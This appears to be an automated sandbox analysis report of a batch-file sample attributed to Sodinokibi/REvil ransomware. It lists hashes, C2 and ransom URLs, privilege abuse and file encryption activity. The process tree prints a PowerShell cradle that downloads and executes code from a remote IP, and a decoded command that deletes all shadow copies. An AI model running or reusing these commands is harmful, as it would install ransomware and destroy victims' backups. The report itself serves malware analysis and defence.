Analysis

max time kernel: 143s
max time network: 137s
platform: windows7_x64
resource: win7v200410
submitted: 22-04-2020 18:10

Static task: static1
Behavioral task: behavioral1
  Sample: bRDkHdRf.bat
  Resource: win7v200410
Behavioral task: behavioral2
  Sample: bRDkHdRf.bat
  Resource: win10v200410
General

Target: bRDkHdRf.bat
Size: 189B
MD5: b0fdd8126abe00e3607bc60b33cfd211
SHA1: 22fe9dfc70b79b53d6a958d30c42dd7640554e8d
SHA256: 8508a74435256a2c8472db03d6c09f8ac0d60ded076803d1dc9e5bec75b162ac
SHA512: cc6eab2d339081bce0d73366bda16a138f53f6ee31b0d39a23ffbe4dfb68511a8d0917092296706b8d9fba32d0aa0efea2d9c89b88baaa5f2b36fe426302514d
Malware Config

Extracted: http://185.103.242.78/pastes/bRDkHdRf
Extracted (C:\ivx701a929-readme.txt):
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC
    http://decryptor.cc/FB14B9B4438547FC
Signatures

Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  - powershell.exe, PID 1036
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes (description / PID / process):
  - Token: SeDebugPrivilege, PID 1036, powershell.exe
  - Token: SeDebugPrivilege, PID 1036, powershell.exe
  - Token: SeDebugPrivilege, PID 1508, powershell.exe
  - Token: SeBackupPrivilege, PID 1728, vssvc.exe
  - Token: SeRestorePrivilege, PID 1728, vssvc.exe
  - Token: SeAuditPrivilege, PID 1728, vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 1036, powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes (PID / process):
  - 1036 powershell.exe
  - 1036 powershell.exe
  - 1036 powershell.exe
  - 1508 powershell.exe
  - 1508 powershell.exe
Blacklisted process makes network request (56 IoCs)
Processes:
  - powershell.exe, PID 1036, flows: 3, 5, 6, 8, 10, 11, 13, 15, 17, 18, 20, 21, 23, 24, 26, 27, 29, 31, 32, 34, 37, 39, 41, 42, 45, 46, 48, 50, 52, 56, 58, 59, 61, 63, 64, 66, 68, 69, 71, 72, 74, 76, 81, 83, 85, 87, 89, 91, 92, 93, 95, 97, 98, 100, 102, 104
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  - powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\76bzc.bmp"
Makes http(s) request (17 IoCs)
Contacts server via http/https, possibly for C2 communication.
Processes (flow / HTTP URL):
  - 3   http://185.103.242.78/pastes/bRDkHdRf
  - 8   https://patrickfoundation.net/uploads/graphic/roefpdiqqsjygs.jpg
  - 13  https://allfortheloveofyou.com/content/image/wrkpwaxyhemh.png
  - 15  https://hexcreatives.co/uploads/assets/tnajacsaxbgj.png
  - 34  https://stoeferlehalle.de/news/graphic/uhymeidy.jpg
  - 37  https://coding-marking.com/static/assets/qubvwwiv.png
  - 39  https://serce.info.pl/content/temp/ko.gif
  - 50  http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
  - 61  https://danskretursystem.dk/static/images/insn.jpg
  - 63  https://www.danskretursystem.dk/static/images/insn.jpg
  - 64  https://www.danskretursystem.dk/static/images/insn.jpg/
  - 76  https://gymnasedumanagement.com/data/pictures/bneint.gif
  - 81  https://triactis.com/news/images/es.png
  - 83  https://www.triactis.com/page-403.php
  - 85  https://waynela.com/news/images/evpoulkh.jpg
  - 87  https://www.waynela.com/news/images/evpoulkh.jpg
  - 91  https://zewatchers.com/news/images/zewtjx.jpg
Drops file in System32 directory (1 IoC)
Processes:
  - powershell.exe: File opened for modification C:\Windows\System32\CatRoot2\dberr.txt
Modifies service (2 TTPs, 4 IoCs)
Processes:
  - vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  - vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  - vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  - vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
Suspicious use of WriteProcessMemory (5 IoCs)
Processes (source PID / process -> target PID / process):
  - PID 2024 cmd.exe wrote to memory of PID 1036 powershell.exe
  - PID 1036 powershell.exe wrote to memory of PID 1508 powershell.exe
  - PID 1036 powershell.exe wrote to memory of PID 1508 powershell.exe
  - PID 1036 powershell.exe wrote to memory of PID 1508 powershell.exe
  - PID 1036 powershell.exe wrote to memory of PID 1508 powershell.exe
Modifies system certificate store
Processes:
  - powershell.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  - powershell.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted)
Enumerates connected drives (3 TTPs)
Drops file in Program Files directory (16 IoCs)
Processes (all powershell.exe):
  - File created \??\c:\program files (x86)\ivx701a929-readme.txt
  - File opened for modification \??\c:\program files\LimitGrant.snd
  - File opened for modification \??\c:\program files\SuspendGet.odt
  - File opened for modification \??\c:\program files\UpdateUnpublish.xht
  - File created \??\c:\program files\microsoft sql server compact edition\v3.5\ivx701a929-readme.txt
  - File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ivx701a929-readme.txt
  - File created \??\c:\program files\ivx701a929-readme.txt
  - File opened for modification \??\c:\program files\DisableUndo.au3
  - File opened for modification \??\c:\program files\EnableSync.edrwx
  - File opened for modification \??\c:\program files\JoinClear.pptm
  - File created \??\c:\program files\microsoft sql server compact edition\ivx701a929-readme.txt
  - File opened for modification \??\c:\program files\RegisterUnregister.mpg
  - File opened for modification \??\c:\program files\SaveRepair.emz
  - File opened for modification \??\c:\program files\CompleteUninstall.dotx
  - File opened for modification \??\c:\program files\ConvertToRestore.ttc
  - File opened for modification \??\c:\program files\SwitchUnprotect.wm
Processes

- C:\Windows\system32\cmd.exe (depth 1)
  Command: cmd /c "C:\Users\Admin\AppData\Local\Temp\bRDkHdRf.bat"
  PID: 2024
  Signatures:
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bRDkHdRf');Invoke-JUCJCK;Start-Sleep -s 10000"
    PID: 1036
    Signatures:
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
      - Sets desktop wallpaper using registry
      - Drops file in System32 directory
      - Suspicious use of WriteProcessMemory
      - Modifies system certificate store
      - Drops file in Program Files directory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all volume shadow copies, which accounts for the vssvc.exe activity below)
      PID: 1508
      Signatures:
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses

- C:\Windows\system32\vssvc.exe (depth 1)
  Command: C:\Windows\system32\vssvc.exe
  PID: 1728
  Signatures:
    - Suspicious use of AdjustPrivilegeToken
    - Modifies service